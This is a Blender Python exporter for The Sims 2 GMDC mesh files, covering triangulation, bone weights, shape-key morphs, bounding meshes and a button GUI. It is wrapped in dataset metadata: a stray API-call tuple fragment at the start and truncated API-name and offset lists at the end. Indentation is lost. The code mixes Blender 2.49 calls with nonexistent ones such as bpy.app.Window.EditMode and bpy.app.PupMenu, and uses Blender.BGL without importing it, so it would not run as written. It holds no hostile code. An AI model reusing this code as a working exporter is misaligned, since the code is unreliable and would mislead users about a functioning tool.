time\n'), ((4821, 4832), 'time.time', 'time.time', ([], {}), '()\n', (4830, 4832), False, 'import time\n'), ((14048, 14059), 'time.time', 'time.time', ([], {}), '()\n', (14057, 14059), False, 'import time\n')]
|
#!BPY
"""
Name: 'GMDC (.gmdc)'
Blender: 249
Group: 'Export'
Tooltip: 'Export to TS2 GMDC file' """
# -------------------------------------------------------------------------------
# Copyright (C) 2016 DjAlex88 (https://github.com/djalex88/)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# -------------------------------------------------------------------------------
import os
from struct import pack
from io_scene_gmdc.gmdc_tools import *
from itertools import count, repeat
import bpy
from mathutils import Vector as BlenderVector
########################################
## Exporter
########################################
def prepare_geometry(settings):
scene = bpy.data.scenes.active
# get all mesh objects
objects = filter(lambda obj: obj.type == 'Mesh', scene.objects)
# check whether visual transforms applied
v = [obj for obj in objects if tuple(obj.rot) != (0, 0, 0) or tuple(obj.size) != (1, 1, 1)]
if v:
error('Error! The following mesh ' + (
'objects have' if len(v) > 1 else 'object has') + ' non-applied visual transforms:')
for obj in v:
error('\x20\x20%s -> rot: %s, size: %s' % (str(obj), str(obj.rot), str(obj.size)))
error('Solution: apply visual transforms (Ctrl+A).')
return False
if settings['export_bmesh']:
# does bounding mesh exist?
v = [i for i, obj in enumerate(objects) if obj.name == settings['bmesh_name']]
if not v:
error('Error! Could not find bounding mesh.')
return False
# remove from objects
del objects[v[0]]
if not objects:
error('Error! Object list is empty.')
return False
#
# inverse transforms
#
inverse_transforms = None
if settings['export_rigging']:
if scene.properties.has_key('gmdc_inverse_transforms'):
v = tuple(scene.properties['gmdc_inverse_transforms'])
assert len(v) % 7 == 0
v = [chunk(t, 4) for t in chunk(v, 7)]
inverse_transforms = v
else:
error('Error! No inverse transforms. (scene.properties["gmdc_inverse_transforms"] is not defined.)')
return False
#
# process main geometry
#
DATA_GROUPS = [];
INDEX_GROUPS = []
MORPH_NAMES = [] # [index] -> name
log('Main geometry')
for obj in objects:
log(str(obj))
# make current object active and activate basic shape key
scene.objects.active = obj
obj.activeShape = 1
bpy.app.Window.EditMode(1)
bpy.app.Window.EditMode(0)
mesh = obj.getData(mesh=True)
all_vertices = [] # for non-indexed vertices
bone_indices = {} # used to enumerate bones { global_bone_index -> local_bone_index }
# faces
#
mesh_faces = mesh.faces
if not mesh_faces:
error('Error! Mesh object has no faces.')
return False
# all faces must have texture coordinates
try:
assert all(face.uv for face in mesh_faces)
except:
error('Error! Mesh object has faces with no texture coordinates.')
return False
# tangents
if settings['export_tangents']:
mesh_tangents = [[tuple(x.xyz) for x in tangents] for tangents in mesh.getTangents()]
else:
mesh_tangents = repeat((None, None, None, None)) # no tangents
obj_loc = obj.matrix[3].xyz
# rigging
rigging = settings['export_rigging']
for face, tangents in zip(mesh_faces, mesh_tangents):
verts = [tuple((v.co + obj_loc).xyz) for v in face.verts]
norms = [tuple(v.no.xyz) for v in face.verts] if face.smooth else [tuple(face.no.xyz)] * len(verts)
uv = [(t.x, 1.0 - t.y) for t in face.uv] # OpenGL -> Direct3D
if rigging:
bones = []
weights = []
for v in face.verts:
v_groups = mesh.getVertexInfluences(v.index)
b = tuple()
w = tuple()
for name, f in v_groups:
# get bone index
s = name.split('#')
try:
assert f > 0.0
idx = int(s[-1])
if len(s) < 2 or idx < 0: raise Exception()
except AssertionError:
pass
except:
log(
'Warning! Could not extract bone index from vertex group name "%s". Influence on vertex # %i ignored.' % (
name, v.index))
else:
k = bone_indices.get(idx)
if k == None:
k = len(bone_indices)
bone_indices[idx] = k
b += (k,)
w += (f,)
if len(b) > 4:
error('Error! Vertex # %i of mesh object "%s" is in more that 4 vertex groups.' % (
v.index, obj.name))
return False
# normalize weights
f = sum(w)
if f > 0.0001:
w = tuple(x / f for x in w)
else:
w = tuple(0.0 for x in w) # ?
bones.append(b)
weights.append(w)
else:
bones = [(), (), (), ()]
weights = [(), (), (), ()]
# triangulate (if needed)
if len(face.verts) == 4:
order = (0, 1, 2, 0, 2, 3)
verts = [verts[i] for i in order]
norms = [norms[i] for i in order]
uv = [uv[i] for i in order]
bones = [bones[i] for i in order]
weights = [weights[i] for i in order]
tangents = [tangents[i] for i in order]
# add vertices to list
all_vertices += zip(verts, norms, uv, bones, weights, tangents)
# <- faces
mesh_tangents = None
#
# morphs / vertex animations
#
morphing = settings['export_morphs'] and mesh.key and len(mesh.key.blocks) > 1
if morphing:
morphing = settings['export_morphs'] # 1 - dVerts only; 2 - dVerts & dNorms
log('--Processing shape keys...')
mesh_morphs = [] # current mesh morphs
first_new_morph_index = None # first new morph that is not present in MORPH_NAMES
dVerts = []
dNorms = []
# compute differences
for k, key_block in enumerate(mesh.key.blocks[1:], 2):
name = tuple(key_block.name.strip().split('::'))
if len(name) != 2:
error('Error! Invalid morph name: "%s"' % '::'.join(name))
return False
try:
j = MORPH_NAMES.index(name)
except ValueError:
# new morph
j = len(MORPH_NAMES)
MORPH_NAMES.append(name)
if first_new_morph_index == None: first_new_morph_index = j
mesh_morphs.append(j)
log('--Key "%s" (%i)' % (name, k))
# activate morph
obj.activeShape = k
bpy.app.Window.EditMode(1)
bpy.app.Window.EditMode(0)
key_block_verts = key_block.getData()
# add difference arrays
dv = [];
dVerts.append(dv)
dn = [];
dNorms.append(dn)
# loop through all faces and compute vertex differences
j = 0
for face in mesh_faces:
verts = [(key_block_verts[v.index] + obj_loc) for v in face.verts]
norms = [v.no for v in face.verts] if face.smooth else [face.no] * len(verts)
if len(face.verts) == 4:
order = (0, 1, 2, 0, 2, 3)
verts = [verts[i] for i in order]
norms = [norms[i] for i in order]
for v, w in zip(verts, norms):
dv.append(tuple((v - BlenderVector(all_vertices[j][0])).xyz))
dn.append(tuple((w - BlenderVector(all_vertices[j][1])).xyz))
j += 1
assert j == len(all_vertices)
log('--Packing...')
k = len(all_vertices)
keys = [[] for i in range(k)]
if morphing == 2: # vertices and normals
v = [[] for i in range(k)]
w = [[] for i in range(k)]
for i, dv, dn in zip(mesh_morphs, dVerts, dNorms): # loop through all difference arrays (morphs)
for x, y, k, a, b in zip(dv, dn, keys, v, w):
if x != (0.0, 0.0, 0.0) or y != (0.0, 0.0, 0.0): # vertex affected
if len(k) == 4:
error('Error! Some vertices are affected by more than 4 morphs (shape keys).')
return False
# morph index
k.append(i)
# difference
a.append(x)
b.append(y)
dVerts = v;
v = None
dNorms = w;
w = None
else: # vertices only
v = [[] for i in range(k)]
for i, dv in zip(mesh_morphs, dVerts):
for x, k, a in zip(dv, keys, v):
if x != (0.0, 0.0, 0.0):
if len(k) == 4:
error('Error! Some vertices are affected by more than 4 morphs (shape keys).')
return False
# morph index
k.append(i)
# difference
a.append(x)
dVerts = v;
v = None
assert len(dVerts) == len(all_vertices)
if not any(keys):
log('--Differeces between shape keys of mesh object "%s" were not detected.' % obj.name)
morphing = False
if first_new_morph_index != None:
del MORPH_NAMES[first_new_morph_index:] # remove newly added morph names
else:
keys = map(tuple, keys)
j = max(len(v) for v in dVerts) # number of difference arrays
log('--Number of arrays:', j)
dVerts = [(tuple(dv) + ((0.0, 0.0, 0.0),) * 4)[:j] for dv in dVerts] # align
if morphing == 2:
dNorms = [(tuple(dn) + ((0.0, 0.0, 0.0),) * 4)[:j] for dn in dNorms]
for i, k, dv, dn in zip(count(), keys, dVerts, dNorms):
all_vertices[i] += (k, dv, dn)
else:
for i, k, dv in zip(count(), keys, dVerts):
all_vertices[i] += (k, dv)
dVerts = dNorms = None;
keys = None
# <- morphing
#
# index geometry
#
log('--Indexing geometry...')
unique_verts = {} # { vertex -> index }
indices = []
for vertex in all_vertices:
k = unique_verts.setdefault(vertex, len(unique_verts))
indices.append(k)
unique_verts = [v for v, i in sorted(unique_verts.iteritems(), key=lambda x: x[1])]
log('\x20\x20--Vertex count: %i -> %i' % (len(all_vertices), len(unique_verts)))
del all_vertices
V, N, T, B, W, X, K, dV, dN = map(list, zip(*unique_verts)) + (
[None, None, None] if not morphing else [None] * (2 - morphing))
del unique_verts
#
# add new data group or extend an existing one
#
# does the mesh have rigging data ?
rigging = rigging and any(B)
# try to find a suitable data group
group = None
for i, g in enumerate(DATA_GROUPS):
b1 = bool(g.bones) == rigging
if morphing:
b2 = sum(bool(x) for x in g.dVerts) == len(dV[0]) # same number of difference arrays
else:
b2 = not bool(g.dVerts[0]) # no difference arrays
if b1 and b2:
# found
ref_group, group = i, g
break
if group:
k = group.count
indices = map(lambda x: x + k, indices) # shift indices
log('--Extending group # %i...' % ref_group)
else:
ref_group = len(DATA_GROUPS)
group = DataGroup();
DATA_GROUPS.append(group)
log('--Adding new group # %i...' % ref_group)
# add vertices to group
#
group.vertices.extend(V)
group.normals.extend(N)
group.tex_coords.extend(T)
if rigging:
group.bones.extend(B)
group.weights.extend(W)
if settings['export_tangents']:
group.tangents.extend(X)
if morphing:
group.keys.extend(K)
dV = map(list, zip(*dV)) + [[], [], []]
for v, w in zip(group.dVerts, dV): v.extend(w)
if morphing > 1:
dN = map(list, zip(*dN)) + [[], [], []]
for v, w in zip(group.dNorms, dV): v.extend(w)
del V, N, T, B, W, X, K, dV, dN
k = group.count
group.count = len(group.vertices)
log('\x20\x20--Vertex count:', '%i -> %i' % (k, group.count) if k else group.count)
#
# create index group
#
# name
name = obj.name
if settings['use_obj_props']:
try:
x = obj.getProperty('name')
assert x.type == 'STRING' and x.data != ''
except AssertionError:
log('Warning! Invalid data for property "name". Ignored.')
except:
pass
else:
name = x.data
log('--Creating new index group # %i, "%s" (triangles: %i)...' % (len(INDEX_GROUPS), name, len(indices) / 3))
group = IndexGroup(name);
INDEX_GROUPS.append(group)
group.data_group_index = ref_group
group.indices = chunk(tuple(indices), 3) # triangles
indices = None
# flags
if settings['use_obj_props']:
x = None
try:
x = obj.getProperty('flags')
try:
assert x.type == 'STRING'
x = int(x.data, 16)
log('--Flags:', to_hex(pack('<L', x)))
except:
x = None
log('Warning! Invalid data for property "flags". Ignored.')
else:
group.flags = x
except:
# property not found
pass
# bone index mapping
if rigging:
# order items by local bone index
bone_indices = sorted(bone_indices.iteritems(), None, key=lambda x: x[1])
# put global indices
group.bones = []
for idx, j in bone_indices:
if idx >= len(inverse_transforms):
error('Error! No inverse transform for bone # %i.' % idx)
return False
group.bones.append(idx)
bone_indices = None
# <- objects
#
# bounding geometry
#
static_bmesh = None;
dynamic_bmesh = None
if settings['export_bmesh']:
bmesh_obj = bpy.app.Object.Get(settings['bmesh_name'])
mesh = bmesh_obj.getData(mesh=True)
obj_loc = bmesh_obj.matrix[3].xyz
log('Bounding mesh object %s:' % bmesh_obj)
if settings['export_rigging']:
dynamic_bmesh = []
v_groups = {} # { bone_index -> v_group_name }
for name in mesh.getVertGroupNames():
# get bone index
s = name.split('#')
try:
idx = int(s[-1])
if len(s) < 2 or idx < 0: raise Exception()
except:
error('Error! Could not extract bone index from vertex group name "%s".' % name)
return False
v_groups[idx] = name
for idx in range(max(v_groups) + 1):
if idx in v_groups:
indices = set(v[0] for v in mesh.getVertsFromGroup(v_groups[idx], 1) if
v[1] > 0.0) # do not accept vertices with weight == 0
I = [];
dd = {}
for face in mesh.faces:
vi = [v.index for v in face.verts]
flags = sum(2 ** i for i, j in enumerate(vi) if j in indices)
if (flags & 0b0111) == 0b0111: # (0, 1, 2)
I.extend([
dd.setdefault(vi[0], len(dd)),
dd.setdefault(vi[1], len(dd)),
dd.setdefault(vi[2], len(dd))])
if (flags & 0b1101) == 0b1101: # (0, 2, 3)
I.extend([
dd.setdefault(vi[0], len(dd)),
dd.setdefault(vi[2], len(dd)),
dd.setdefault(vi[3], len(dd))])
if dd:
V = []
# get inverse transform
#
if idx >= len(inverse_transforms):
error('Error! No inverse transform for bone # %i.' % idx)
return False
rot, loc = inverse_transforms[idx]
t = Transform(loc, rot)
dd = sorted(dd.iteritems(), None, key=lambda x: x[1])
# set coords
for i, j in dd:
# transform coord into bone space
a = mesh.verts[i].co.xyz + obj_loc
a = t.transformPoint(Vector(a.x, a.y, a.z)).to_tuple()
V.append(a)
I = chunk(I, 3)
dynamic_bmesh.append((V, I))
log('--Part # %02i -> vertices: %i, triangles: %i' % (idx, len(V), len(I)))
else:
dynamic_bmesh.append(None)
else:
dynamic_bmesh.append(None)
if not any(dynamic_bmesh):
dynamic_bmesh = None
else:
V = [tuple((v.co + obj_loc).xyz) for v in mesh.verts]
I = []
for face in mesh.faces:
if len(face.verts) == 3:
I.append(tuple(v.index for v in face.verts))
else:
I.append((face.verts[0].index, face.verts[1].index, face.verts[2].index))
I.append((face.verts[0].index, face.verts[2].index, face.verts[3].index))
static_bmesh = (V, I)
log('--Static bounding mesh -> vertices: %i, triangles: %i' % (len(V), len(I)))
return GeometryData(DATA_GROUPS, INDEX_GROUPS, inverse_transforms, MORPH_NAMES, static_bmesh, dynamic_bmesh)
# -------------------------------------------------------------------------------
# this function does basic checks and initiates the exporter
def begin_export():
bpy.app.Window.EditMode(0)
settings = {
'SGResource': str_resource_name.val.strip(),
'name_suffix': btn_name_suffix.val,
'export_rigging': btn_export_rigging.val,
'export_tangents': btn_export_tangents.val,
'export_bmesh': btn_export_bmesh.val,
'bmesh_name': str_bmesh_name.val.strip(),
'export_morphs': menu_export_morphs.val,
'use_obj_props': btn_use_obj_props.val,
}
_save_log = bool(btn_save_log.val)
gmdc_filename = str_gmdc_filename.val.strip()
if not gmdc_filename:
display_menu('Error!', ['Select filename for GMDC file.']);
return
elif not os.path.basename(gmdc_filename):
display_menu('Error!', ['Invalid filename for GMDC file.']);
return
elif os.path.isfile(gmdc_filename):
if display_menu("File '%s' exists. Rewrite?" % os.path.basename(gmdc_filename), ['Yes, rewrite.']) != 0: return
if settings['export_bmesh'] and not settings['bmesh_name']:
display_menu('Error!', ['Enter bounding mesh\'s object name.'])
return
# create log file (if needed)
if _save_log:
s = gmdc_filename + '.export_log.txt'
log('Opening log file "%s" for writing... ' % s)
try:
f = open(s, 'w')
except IOError as e:
error(e)
display_menu('Error!', ['Could not open log file for writing.'])
return
# Ok
set_log_file(f)
#
# begin export
#
log('==Geometry Data Container Exporter======')
log('GMDC File:', gmdc_filename)
log('Settings:')
log('--SGResource:', settings['SGResource'] and '"%s"' % settings['SGResource'] or 'none')
log('--Name suffix: ', settings['name_suffix'])
log('--Export rigging: ', settings['export_rigging'])
log('--Export tangents: ', settings['export_tangents'])
log('--Export bounding geometry:', settings['export_bmesh'])
log('--Bounding mesh name:', settings['bmesh_name'] and '"%s"' % settings['bmesh_name'] or 'none')
log('--Export morphs: ', settings['export_morphs'])
log('--Use properties: ', settings['use_obj_props'])
log()
s = settings['SGResource']
if not s:
s = os.path.basename(gmdc_filename).split(".")
s = ".".join(s[:-1] or s)
if settings['name_suffix']:
s += '_tslocator_gmdc'
log('Preparing geometry...')
geometry = None
try:
geometry = prepare_geometry(settings)
except:
print_last_exception()
if not geometry:
display_menu('Error!', ['An error has occured while preparing geometry. See log for details.'])
close_log_file()
return
log()
log('Creating GMDC file "%s"... ' % gmdc_filename)
try:
create_gmdc_file(gmdc_filename, s, geometry)
except:
print_last_exception()
display_menu('Error!', ['An error has occured while creating GMDC file. See log for details.'])
else:
# Ok
log('Finished!')
# exit prompt
if display_menu("Export complete!", ['Quit']) == 0: bpy.app.Exit()
finally:
close_log_file()
########################################
# GUI
########################################
def display_menu(caption, items, choice_required=False):
b = True
while b:
choice = bpy.app.PupMenu('%s%%t|' % caption + "|".join('%s%%x%i' % (s, i) for i, s in enumerate(items)), 0x100)
b = choice_required and choice < 0
return choice
def draw_gui():
global str_gmdc_filename, str_cres_filename, str_resource_name, btn_name_suffix, \
btn_export_tangents, btn_export_rigging, btn_export_bmesh, btn_save_log, \
menu_export_morphs, btn_use_obj_props, str_bmesh_name
pos_y = 340;
MAX_PATH = 200
# frame
Blender.BGL.glColor3f(0.75, 0.75, 0.75)
Blender.BGL.glRecti(10, 10, 430, pos_y)
pos_y -= 30
# plugin's header
s = "GMDC Exporter (TS2)"
Blender.BGL.glColor3f(0.8, 0.8, 0.8)
Blender.BGL.glRecti(10, pos_y, 430, pos_y + 30)
bpy.app.Label(s, 20, pos_y, 400, 30)
pos_y -= 30
# GMDC file selector
bpy.app.Label("GMDC file (output)", 20, pos_y, 200, 20)
pos_y -= 20
bpy.app.BeginAlign()
str_gmdc_filename = bpy.app.String("", 0x10, 20, pos_y, 300, 20, str_gmdc_filename.val, MAX_PATH, "Path to GMDC file")
bpy.app.PushButton("Select file", 0x11, 320, pos_y, 100, 20, "Open file browser")
bpy.app.EndAlign()
pos_y -= 35
# geometry name
Blender.BGL.glColor3f(0.7, 0.7, 0.7)
Blender.BGL.glRecti(20, pos_y - 60, 420, pos_y + 20)
bpy.app.Label("SGResource name (optional)", 25, pos_y, 400, 20);
pos_y -= 20
bpy.app.Label("If not provided then GMDC filename is used", 25, pos_y, 400, 20);
pos_y -= 30
bpy.app.BeginAlign()
str_resource_name = bpy.app.String("", 0x50, 70, pos_y, 180, 20, str_resource_name.val, 50,
"SGResource name of this geometry")
btn_name_suffix = bpy.app.Toggle("_tslocator_gmdc", 0x51, 250, pos_y, 120, 20, btn_name_suffix.val,
"Add default suffix")
bpy.app.EndAlign()
pos_y -= 45
# options
bpy.app.BeginAlign()
btn_export_rigging = bpy.app.Toggle("Rigging", 0x31, 20, pos_y, 100, 20, btn_export_rigging.val,
"Export rigging data (bone indices, weights)")
btn_export_tangents = bpy.app.Toggle("Tangents", 0x32, 120, pos_y, 100, 20, btn_export_tangents.val,
"Export tangents (required for bump mapping)")
btn_export_bmesh = bpy.app.Toggle("Bound. mesh", 0x33, 220, pos_y, 100, 20, btn_export_bmesh.val,
"Export bounding geometry")
btn_save_log = bpy.app.Toggle("Save log", 0x34, 320, pos_y, 100, 20, btn_save_log.val,
"Write script's log data into file *.export_log.txt")
bpy.app.EndAlign()
pos_y -= 30
bpy.app.BeginAlign()
menu_export_morphs = bpy.app.Menu(
"Export morphs %t|Do not export morphs %x0|Diff. in v.coords only %x1|Diff. in v.coords and normals %x2", 0x35,
20, pos_y, 200, 20, menu_export_morphs.val)
btn_use_obj_props = bpy.app.Toggle("Use object properties", 0x36, 220, pos_y, 200, 20, btn_use_obj_props.val,
"Properties can be assigned in logic panel")
bpy.app.EndAlign()
pos_y -= 30
# bounding mesh name
bpy.app.Label("Bounding mesh:", 20, pos_y, 100, 20)
str_bmesh_name = bpy.app.String("", 0x40, 120, pos_y, 200, 20, str_bmesh_name.val, 50,
"Name of mesh object that will be exported as bounding mesh")
pos_y -= 50
# buttons
bpy.app.BeginAlign()
bpy.app.PushButton("Export", 1, 120, pos_y, 100, 30, "Export geometry (Ctrl + Enter)")
bpy.app.PushButton("Exit", 0, 220, pos_y, 100, 30, "Terminate the script (Esc)")
bpy.app.EndAlign()
# ---------------------------------------
# event handlers
l_ctrl_key_pressed = 0
r_ctrl_key_pressed = 0
def set_gmdc_filename(filename):
global gmdc_filename
str_gmdc_filename.val = filename
def event_handler(evt, val):
global l_ctrl_key_pressed, r_ctrl_key_pressed
if evt == bpy.app.ESCKEY and val:
bpy.app.Exit()
elif evt == bpy.app.LEFTCTRLKEY:
l_ctrl_key_pressed = val
elif evt == bpy.app.RIGHTCTRLKEY:
r_ctrl_key_pressed = val
elif evt == bpy.app.RETKEY and val and (l_ctrl_key_pressed or r_ctrl_key_pressed):
begin_export()
l_ctrl_key_pressed = 0
r_ctrl_key_pressed = 0
def button_events(evt):
if evt == 0:
bpy.app.Exit()
elif evt == 1:
begin_export()
elif evt == 0x11:
bpy.app.Window.FileSelector(set_gmdc_filename, 'Select', bpy.sys.makename(ext='.gmdc'))
# -------------------------------------------------------------------------------
# set default values for GUI elements and run event loop
str_gmdc_filename = bpy.app.Create("")
str_resource_name = bpy.app.Create("")
btn_name_suffix = bpy.app.Create(1)
btn_export_rigging = bpy.app.Create(0)
btn_export_tangents = bpy.app.Create(0)
btn_export_bmesh = bpy.app.Create(0)
btn_save_log = bpy.app.Create(0)
btn_use_obj_props = bpy.app.Create(0)
menu_export_morphs = bpy.app.Create(0)
str_bmesh_name = bpy.app.Create("b_mesh")
bpy.app.Register(draw_gui, event_handler, button_events)
|
[
"bpy.app.Menu",
"os.path.isfile",
"bpy.app.Register",
"bpy.app.BeginAlign",
"bpy.app.Label",
"bpy.app.EndAlign",
"struct.pack",
"bpy.app.Window.EditMode",
"bpy.app.Exit",
"os.path.basename",
"bpy.app.Create",
"itertools.count",
"bpy.app.Toggle",
"itertools.repeat",
"bpy.sys.makename",
"mathutils.Vector",
"bpy.app.String",
"bpy.app.Object.Get",
"bpy.app.PushButton"
] |
[((29053, 29071), 'bpy.app.Create', 'bpy.app.Create', (['""""""'], {}), "('')\n", (29067, 29071), False, 'import bpy\n'), ((29092, 29110), 'bpy.app.Create', 'bpy.app.Create', (['""""""'], {}), "('')\n", (29106, 29110), False, 'import bpy\n'), ((29129, 29146), 'bpy.app.Create', 'bpy.app.Create', (['(1)'], {}), '(1)\n', (29143, 29146), False, 'import bpy\n'), ((29168, 29185), 'bpy.app.Create', 'bpy.app.Create', (['(0)'], {}), '(0)\n', (29182, 29185), False, 'import bpy\n'), ((29208, 29225), 'bpy.app.Create', 'bpy.app.Create', (['(0)'], {}), '(0)\n', (29222, 29225), False, 'import bpy\n'), ((29245, 29262), 'bpy.app.Create', 'bpy.app.Create', (['(0)'], {}), '(0)\n', (29259, 29262), False, 'import bpy\n'), ((29278, 29295), 'bpy.app.Create', 'bpy.app.Create', (['(0)'], {}), '(0)\n', (29292, 29295), False, 'import bpy\n'), ((29316, 29333), 'bpy.app.Create', 'bpy.app.Create', (['(0)'], {}), '(0)\n', (29330, 29333), False, 'import bpy\n'), ((29355, 29372), 'bpy.app.Create', 'bpy.app.Create', (['(0)'], {}), '(0)\n', (29369, 29372), False, 'import bpy\n'), ((29390, 29414), 'bpy.app.Create', 'bpy.app.Create', (['"""b_mesh"""'], {}), "('b_mesh')\n", (29404, 29414), False, 'import bpy\n'), ((29416, 29472), 'bpy.app.Register', 'bpy.app.Register', (['draw_gui', 'event_handler', 'button_events'], {}), '(draw_gui, event_handler, button_events)\n', (29432, 29472), False, 'import bpy\n'), ((21012, 21038), 'bpy.app.Window.EditMode', 'bpy.app.Window.EditMode', (['(0)'], {}), '(0)\n', (21035, 21038), False, 'import bpy\n'), ((25079, 25115), 'bpy.app.Label', 'bpy.app.Label', (['s', '(20)', 'pos_y', '(400)', '(30)'], {}), '(s, 20, pos_y, 400, 30)\n', (25092, 25115), False, 'import bpy\n'), ((25164, 25219), 'bpy.app.Label', 'bpy.app.Label', (['"""GMDC file (output)"""', '(20)', 'pos_y', '(200)', '(20)'], {}), "('GMDC file (output)', 20, pos_y, 200, 20)\n", (25177, 25219), False, 'import bpy\n'), ((25240, 25260), 'bpy.app.BeginAlign', 'bpy.app.BeginAlign', ([], {}), '()\n', (25258, 25260), False, 'import bpy\n'), ((25285, 25385), 'bpy.app.String', 'bpy.app.String', (['""""""', '(16)', '(20)', 'pos_y', '(300)', '(20)', 'str_gmdc_filename.val', 'MAX_PATH', '"""Path to GMDC file"""'], {}), "('', 16, 20, pos_y, 300, 20, str_gmdc_filename.val, MAX_PATH,\n 'Path to GMDC file')\n", (25299, 25385), False, 'import bpy\n'), ((25388, 25467), 'bpy.app.PushButton', 'bpy.app.PushButton', (['"""Select file"""', '(17)', '(320)', 'pos_y', '(100)', '(20)', '"""Open file browser"""'], {}), "('Select file', 17, 320, pos_y, 100, 20, 'Open file browser')\n", (25406, 25467), False, 'import bpy\n'), ((25474, 25492), 'bpy.app.EndAlign', 'bpy.app.EndAlign', ([], {}), '()\n', (25490, 25492), False, 'import bpy\n'), ((25635, 25698), 'bpy.app.Label', 'bpy.app.Label', (['"""SGResource name (optional)"""', '(25)', 'pos_y', '(400)', '(20)'], {}), "('SGResource name (optional)', 25, pos_y, 400, 20)\n", (25648, 25698), False, 'import bpy\n'), ((25720, 25799), 'bpy.app.Label', 'bpy.app.Label', (['"""If not provided then GMDC filename is used"""', '(25)', 'pos_y', '(400)', '(20)'], {}), "('If not provided then GMDC filename is used', 25, pos_y, 400, 20)\n", (25733, 25799), False, 'import bpy\n'), ((25821, 25841), 'bpy.app.BeginAlign', 'bpy.app.BeginAlign', ([], {}), '()\n', (25839, 25841), False, 'import bpy\n'), ((25866, 25975), 'bpy.app.String', 'bpy.app.String', (['""""""', '(80)', '(70)', 'pos_y', '(180)', '(20)', 'str_resource_name.val', '(50)', '"""SGResource name of this geometry"""'], {}), "('', 80, 70, pos_y, 180, 20, str_resource_name.val, 50,\n 'SGResource name of this geometry')\n", (25880, 25975), False, 'import bpy\n'), ((26032, 26138), 'bpy.app.Toggle', 'bpy.app.Toggle', (['"""_tslocator_gmdc"""', '(81)', '(250)', 'pos_y', '(120)', '(20)', 'btn_name_suffix.val', '"""Add default suffix"""'], {}), "('_tslocator_gmdc', 81, 250, pos_y, 120, 20, btn_name_suffix.\n val, 'Add default suffix')\n", (26046, 26138), False, 'import bpy\n'), ((26174, 26192), 'bpy.app.EndAlign', 'bpy.app.EndAlign', ([], {}), '()\n', (26190, 26192), False, 'import bpy\n'), ((26230, 26250), 'bpy.app.BeginAlign', 'bpy.app.BeginAlign', ([], {}), '()\n', (26248, 26250), False, 'import bpy\n'), ((26276, 26400), 'bpy.app.Toggle', 'bpy.app.Toggle', (['"""Rigging"""', '(49)', '(20)', 'pos_y', '(100)', '(20)', 'btn_export_rigging.val', '"""Export rigging data (bone indices, weights)"""'], {}), "('Rigging', 49, 20, pos_y, 100, 20, btn_export_rigging.val,\n 'Export rigging data (bone indices, weights)')\n", (26290, 26400), False, 'import bpy\n'), ((26462, 26589), 'bpy.app.Toggle', 'bpy.app.Toggle', (['"""Tangents"""', '(50)', '(120)', 'pos_y', '(100)', '(20)', 'btn_export_tangents.val', '"""Export tangents (required for bump mapping)"""'], {}), "('Tangents', 50, 120, pos_y, 100, 20, btn_export_tangents.val,\n 'Export tangents (required for bump mapping)')\n", (26476, 26589), False, 'import bpy\n'), ((26649, 26757), 'bpy.app.Toggle', 'bpy.app.Toggle', (['"""Bound. mesh"""', '(51)', '(220)', 'pos_y', '(100)', '(20)', 'btn_export_bmesh.val', '"""Export bounding geometry"""'], {}), "('Bound. mesh', 51, 220, pos_y, 100, 20, btn_export_bmesh.val,\n 'Export bounding geometry')\n", (26663, 26757), False, 'import bpy\n'), ((26810, 26937), 'bpy.app.Toggle', 'bpy.app.Toggle', (['"""Save log"""', '(52)', '(320)', 'pos_y', '(100)', '(20)', 'btn_save_log.val', '"""Write script\'s log data into file *.export_log.txt"""'], {}), '(\'Save log\', 52, 320, pos_y, 100, 20, btn_save_log.val,\n "Write script\'s log data into file *.export_log.txt")\n', (26824, 26937), False, 'import bpy\n'), ((26971, 26989), 'bpy.app.EndAlign', 'bpy.app.EndAlign', ([], {}), '()\n', (26987, 26989), False, 'import bpy\n'), ((27012, 27032), 'bpy.app.BeginAlign', 'bpy.app.BeginAlign', ([], {}), '()\n', (27030, 27032), False, 'import bpy\n'), ((27058, 27234), 'bpy.app.Menu', 'bpy.app.Menu', (['"""Export morphs %t|Do not export morphs %x0|Diff. in v.coords only %x1|Diff. in v.coords and normals %x2"""', '(53)', '(20)', 'pos_y', '(200)', '(20)', 'menu_export_morphs.val'], {}), "(\n 'Export morphs %t|Do not export morphs %x0|Diff. in v.coords only %x1|Diff. in v.coords and normals %x2'\n , 53, 20, pos_y, 200, 20, menu_export_morphs.val)\n", (27070, 27234), False, 'import bpy\n'), ((27268, 27404), 'bpy.app.Toggle', 'bpy.app.Toggle', (['"""Use object properties"""', '(54)', '(220)', 'pos_y', '(200)', '(20)', 'btn_use_obj_props.val', '"""Properties can be assigned in logic panel"""'], {}), "('Use object properties', 54, 220, pos_y, 200, 20,\n btn_use_obj_props.val, 'Properties can be assigned in logic panel')\n", (27282, 27404), False, 'import bpy\n'), ((27443, 27461), 'bpy.app.EndAlign', 'bpy.app.EndAlign', ([], {}), '()\n', (27459, 27461), False, 'import bpy\n'), ((27510, 27561), 'bpy.app.Label', 'bpy.app.Label', (['"""Bounding mesh:"""', '(20)', 'pos_y', '(100)', '(20)'], {}), "('Bounding mesh:', 20, pos_y, 100, 20)\n", (27523, 27561), False, 'import bpy\n'), ((27583, 27716), 'bpy.app.String', 'bpy.app.String', (['""""""', '(64)', '(120)', 'pos_y', '(200)', '(20)', 'str_bmesh_name.val', '(50)', '"""Name of mesh object that will be exported as bounding mesh"""'], {}), "('', 64, 120, pos_y, 200, 20, str_bmesh_name.val, 50,\n 'Name of mesh object that will be exported as bounding mesh')\n", (27597, 27716), False, 'import bpy\n'), ((27785, 27805), 'bpy.app.BeginAlign', 'bpy.app.BeginAlign', ([], {}), '()\n', (27803, 27805), False, 'import bpy\n'), ((27810, 27900), 'bpy.app.PushButton', 'bpy.app.PushButton', 